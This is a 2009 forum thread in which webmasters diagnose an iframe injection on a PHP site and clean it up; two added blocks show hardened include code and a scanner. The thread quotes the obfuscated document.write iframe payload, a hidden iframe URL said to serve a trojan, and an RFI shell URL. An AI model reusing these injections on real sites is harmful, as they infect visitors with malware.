Simple PHP page Security
Old 07-11-2009, 12:08 PM Simple PHP page Security
andrei155
CEO of BLD Hosting

Posts: 1,514
Name: Andrei
Location: Canada
Trades: 6
Recently I've been discovering random bits of code in a friend's PHP pages. He has brought it to my attention. It looks like someone is exploiting the PHP page to write the PHP file itself. The PHP file normally looks like this:

Code:
<?php

$title = 'test';

include('overall_header.html');

include('homepage.html');

include('overall_footer.html

?>
However, I've just taken a look - and it now looks like this:

Code:
<?php

$title = 'test';

include('overall_header.html');

include('homepage.html');

include('overall_footer.html

<?php echo '<script>document.write("<i" +"fra" +"me "+ "s" +"r" +"c=http:" +"/" +"/"+ "u"+ "pdate" +"d" +"a" +"te." +"c" +"n" +"/" +" h" +"e" +"i" +"ght=1 " +"wid" +"t" +"h=1" +"><" +"/ifr"+ "am"+ "e" +">")</script>'; ?>
The code seems pretty simple - and I never thought there could be any security holes with that. What could be causing the problem?
Old 07-12-2009, 08:48 AM Re: Simple PHP page Security
davidj
Extreme Talker

Posts: 181
Name: David Jackson
Trades: 0
It's trying to inject a cn file into an iframe.

The file it's pointing to is update.cn on your local machine or server.

A cn file is a CNwin file extension, but this could be different.

I don't know how it's being injected, but the PHP would fail above, and it will probably fail itself as the PHP tags have been injected inside other PHP tags.
Old 07-12-2009, 10:10 AM Re: Simple PHP page Security
chrishirst
Missing! presumed drunk.

Posts: 42,384
Name: Chris Hirst
Location: Blackpool. UK
Trades: 0
It's NOT a "cn" file, it's a URL on a .cn domain opening in a 1px x 1px iframe. Whatever it is doing, hiding an iframe on pages is rarely something you would be doing legitimately.
Old 07-12-2009, 12:11 PM Re: Simple PHP page Security
andrei155
CEO of BLD Hosting

Posts: 1,514
Name: Andrei
Location: Canada
Trades: 6
Quote:
Originally Posted by chrishirst
It's NOT a "cn" file, it's a URL on a .cn domain opening in a 1px x 1px iframe. Whatever it is doing, hiding an iframe on pages is rarely something you would be doing legitimately.
Any Idea how it's being written into the file?
Old 07-13-2009, 11:27 AM Re: Simple PHP page Security
NewBreed
Extreme Talker

Posts: 223
Name: Johnny
Location: Washington
Trades: 0
Is there any other PHP in the other pages? Using a CMS? Also a link to a website that is setup similar to this or the exact website it is from, would prove to be very useful.

Obviously it looks like you got RFI'd.
Old 07-13-2009, 01:57 PM Re: Simple PHP page Security
andrei155
CEO of BLD Hosting

Posts: 1,514
Name: Andrei
Location: Canada
Trades: 6
http://www.denglerdemolition.com/ is the website. What does RFI stand for?
Old 07-13-2009, 04:39 PM Re: Simple PHP page Security
NewBreed
Extreme Talker

Posts: 223
Name: Johnny
Location: Washington
Trades: 0
Remote File Inclusion/Local File Inclusion
RFI/LFI
The given code isn't exploitable.
But it looks as if your contact page is exploitable.
I'm at work and don't have time to dedicate to this at the moment.
I'll be off in a little more than 3 hours and will get back to you with more details to see if my hypothesis is correct.
Old 07-13-2009, 07:38 PM Re: Simple PHP page Security
NewBreed
Extreme Talker

Posts: 223
Name: Johnny
Location: Washington
Trades: 0
I take it you see/saw what I was talking about since you took everything down?
Old 07-13-2009, 08:45 PM Re: Simple PHP page Security
konetch
Ultra Talker

Posts: 258
Trades: 0
Your page has a virus and it's automatically downloading it onto our computers. I got a message from my virus security that a trojan was removed. You can take a look at http://en.wikipedia.org/wiki/Remote_File_Inclusion, hope that will help.

This was the site that was included on homepage.html

http://u1m.ru:8080/index.php
Old 07-13-2009, 08:45 PM Re: Simple PHP page Security
andrei155
CEO of BLD Hosting

Posts: 1,514
Name: Andrei
Location: Canada
Trades: 6
I'm afraid the page may have been hit with another exploit. So the above piece of code is foolproof? If the problem is with the contact page, how is it that only the index page is being messed with?
Old 07-13-2009, 08:54 PM Re: Simple PHP page Security
konetch
Ultra Talker

Posts: 258
Trades: 0
It has to be a problem with your host, because a program is adding the code to your site. When I visited homepage.html the trojan was downloaded. At the bottom of your source code on that page it has the iframe inclusion:

<iframe src="http://u1m.ru:8080/index.php" width=151 height=128 style="visibility: hidden"></iframe>
Old 07-13-2009, 09:04 PM Re: Simple PHP page Security
NewBreed
Extreme Talker

Posts: 223
Name: Johnny
Location: Washington
Trades: 0
konetch, what did you use to get rid of it?
Old 07-13-2009, 09:11 PM Re: Simple PHP page Security
konetch
Ultra Talker

Posts: 258
Trades: 0
Nothing, it is still there; go to http://www.denglerdemolition.com/homepage.html . Make sure you have a virus scanner, otherwise you'll get infected.

It's at the bottom of the page's source code.
Old 07-13-2009, 09:30 PM Re: Simple PHP page Security
andrei155
CEO of BLD Hosting

Posts: 1,514
Name: Andrei
Location: Canada
Trades: 6
Seriously, how is this getting in there? The host (me) really doesn't see any problems.
Old 07-13-2009, 09:32 PM Re: Simple PHP page Security
konetch
Ultra Talker

Posts: 258
Trades: 0
It's probably a PHP configuration problem. Here's what I found:

Quote:
RFI attacks are possible because of several PHP configuration flags:
  • One is called register_globals. register_globals automatically defines variables in the script that are entered in the page URL. In this example, the $page variable will automatically be filled with http://malicious.code.com/C99.txt?archive.php before the script is executed. Because of this security vulnerability, register_globals is set to OFF by default on newer servers.
  • Another one, even more relevant to this attack, is allow_url_fopen. This defines if PHP should be able to fetch remote content in almost any function that takes a file name as a parameter. In PHP 5.2 this setting was separated for the include() family of functions and called allow_url_include. This specifically addresses the fact that the attack described here makes up the majority of security holes in current PHP software.
You'll have to change the PHP configuration on your host.
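An added example, not code from the thread or from the site discussed: the include-from-URL pattern the quoted text describes, next to a hardened form that lets request data pick a key in a fixed allow-list rather than a path, plus a runtime check of the three php.ini flags named above. The page names, the helper names and the `?page=` parameter are assumptions; it needs PHP 7.1 or later.

```php
<?php
// Added example (not code from the thread). The quoted text describes include($page)
// being fed from the URL; below is a hardened replacement and a check of the php.ini
// flags it names. Page names and helper names are assumptions; needs PHP 7.1+.

// Vulnerable shape the quote describes: with register_globals=On, ?page=... fills
// $page before this line runs; with allow_url_include=On a URL is fetched and executed.
//     include($page . '.php');

// Hardened: request data selects a key in a fixed allow-list, never a file path.
const PAGES = [
    'home'    => 'homepage.html',
    'contact' => 'contact.html',
];

function resolve_page(?string $requested): string
{
    if ($requested === null || !array_key_exists($requested, PAGES)) {
        return PAGES['home'];   // unknown key: safe default, and never echo the input back
    }
    return PAGES[$requested];
}

// Report which of the three flags from the quoted text are still enabled.
// ini_get() returns false for a directive this PHP build no longer knows
// (register_globals was removed in PHP 5.4), which counts as off.
function risky_ini_flags(): array
{
    $enabled = [];
    foreach (['register_globals', 'allow_url_fopen', 'allow_url_include'] as $flag) {
        $value = ini_get($flag);
        if ($value !== false && filter_var($value, FILTER_VALIDATE_BOOLEAN)) {
            $enabled[] = $flag;
        }
    }
    return $enabled;
}

// Usage in a page shaped like the one in this thread:
//   include __DIR__ . '/overall_header.html';
//   include __DIR__ . '/' . resolve_page($_GET['page'] ?? null);
//   include __DIR__ . '/overall_footer.html';

var_dump(resolve_page('contact'));                       // a listed key
var_dump(resolve_page('nosuchpage'));                    // unknown key falls back to home
var_dump(resolve_page('http://example.invalid/x.txt'));  // a URL is just another unknown key
var_dump(risky_ini_flags());                             // empty on a host with all three off
```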
Old 07-13-2009, 09:42 PM Re: Simple PHP page Security
andrei155
CEO of BLD Hosting

Posts: 1,514
Name: Andrei
Location: Canada
Trades: 6
I've disabled both; let's see if that was the cause of the problem.
Old 07-13-2009, 09:46 PM Re: Simple PHP page Security
konetch
Ultra Talker

Posts: 258
Trades: 0
You'll need to delete the iframe at the bottom of your source code, in homepage.html for it to go away. It shouldn't come back after that. Plus you'll need to correct the code on your index page from

PHP Code:
<?php

$title = 'test';

include('overall_header.html');

include('homepage.html');

include('overall_footer.html

?>
to

PHP Code:
<?php

$title = 'test';

include('overall_header.html');

include('homepage.html');

include('overall_footer.html');

?>
It will get rid of the parse errors.


Edit: You'll also need to get rid of this

PHP Code:
<?php echo '<script>document.write("<i" +"fra" +"me "+ "s" +"r" +"c=http:" +"/" +"/"+ "u"+ "pdate" +"d" +"a" +"te." +"c" +"n" +"/" +" h" +"e" +"i" +"ght=1 " +"wid" +"t" +"h=1" +"><" +"/ifr"+ "am"+ "e" +">")</script>'?>
on your index.php file.
Old 07-13-2009, 09:50 PM Re: Simple PHP page Security
andrei155
CEO of BLD Hosting

Posts: 1,514
Name: Andrei
Location: Canada
Trades: 6
Oh, that's just an error on my part. Good eye though. I'll try that, thanks.
Old 07-13-2009, 09:58 PM Re: Simple PHP page Security
konetch
Ultra Talker

Posts: 258
Trades: 0
You're welcome. Good luck!
Old 07-14-2009, 04:00 PM Re: Simple PHP page Security
meag20
Junior Talker

Posts: 1
Name: Erin
Trades: 0
I have found 3 of my sites have been infected with this. They were all modified 7/10/2009 at 9:54am. The only common code in each one is <script>document.write("<i" +"fra" +"me "+ "s" +"r" +"c=http:" +"/" +"/"+ "u"+ "pdate" +"d" +"a" +"te." +"c" +"n" +"/" +" h" +"e" +"i" +"ght=1 " +"wid" +"t" +"h=1" +"><" +"/ifr"+ "am"+ "e" +">")</script>'; what is above this is different for each one. At least I have the original information on my machine. I've had to delete the index page from the web and replace it with an old uninfected copy. This has been the only way I've been able to completely get rid of it.
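As an added example, not code from any poster, a PHP scan of a web root for the injection shapes quoted in this thread (a hidden or 1px iframe, a document.write() assembled from string fragments, and a second PHP block echoing a script after the page's own block has closed), reporting each hit with the file's modification time so that hits across several sites can be correlated the way Erin did. The `$root` path and helper names are assumptions; the two sample files it writes under the temp directory are constructed, not taken from any real site.

```php
<?php
// Added example (not from the thread): flag files carrying the injection shapes quoted
// above and report when they were modified. $root and helper names are assumptions.
// One regex per shape seen in this thread; the key is the report label.
const MARKERS = [
    // iframe that is hidden or 1px wide (both snippets in the thread)
    'hidden-or-1px-iframe'      => '/<iframe\b[^>]*(visibility:\s*hidden|width=["\']?1\b)[^>]*>/i',
    // document.write("<i" +"fra" ...): tag name assembled from quoted fragments
    'fragmented-document-write' => '/document\.write\(\s*"[^"]{0,4}"\s*\+\s*"/i',
    // a second PHP block echoing a <script> after the page's own block closed
    'appended-php-echo-script'  => '/\?>\s*<\?php\s+echo\s+\'<script>/i',
];

function suspicious_markers(string $src): array
{
    $hits = [];
    foreach (MARKERS as $name => $re) {
        if (preg_match($re, $src)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Walk $root and return [path => [markers, modified]] for every flagged PHP/HTML/JS file.
function scan_tree(string $root): array
{
    $report = [];
    $files  = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($files as $file) {
        if (!preg_match('/\.(php|html?|js)$/i', $file->getFilename())) {
            continue;
        }
        $hits = suspicious_markers((string) file_get_contents($file->getPathname()));
        if ($hits) {
            $report[$file->getPathname()] = ['markers' => $hits, 'modified' => date('Y-m-d H:i:s', $file->getMTime())];
        }
    }
    ksort($report);
    return $report;
}

// Constructed stand-in for a web root (sample files, not a real site) so the block runs offline.
$root = sys_get_temp_dir() . '/iframe_scan_demo';
is_dir($root) || mkdir($root);
file_put_contents("$root/index.php", "<?php include('homepage.html'); ?>\n<?php echo '<script>document.write(\"<i\" +\"fra\" +\"me\")</script>'; ?>\n");
file_put_contents("$root/homepage.html", "<p>Welcome</p>\n<iframe src=\"http://example.invalid/\" width=151 height=128 style=\"visibility: hidden\"></iframe>\n");
foreach (scan_tree($root) as $path => $info) {
    printf("%s  modified %s  [%s]\n", $path, $info['modified'], implode(', ', $info['markers']));
}
```

Point `$root` at the document root of a real site to get the same listing; files whose modification time clusters, as in the three sites above, are the ones to restore from a clean copy.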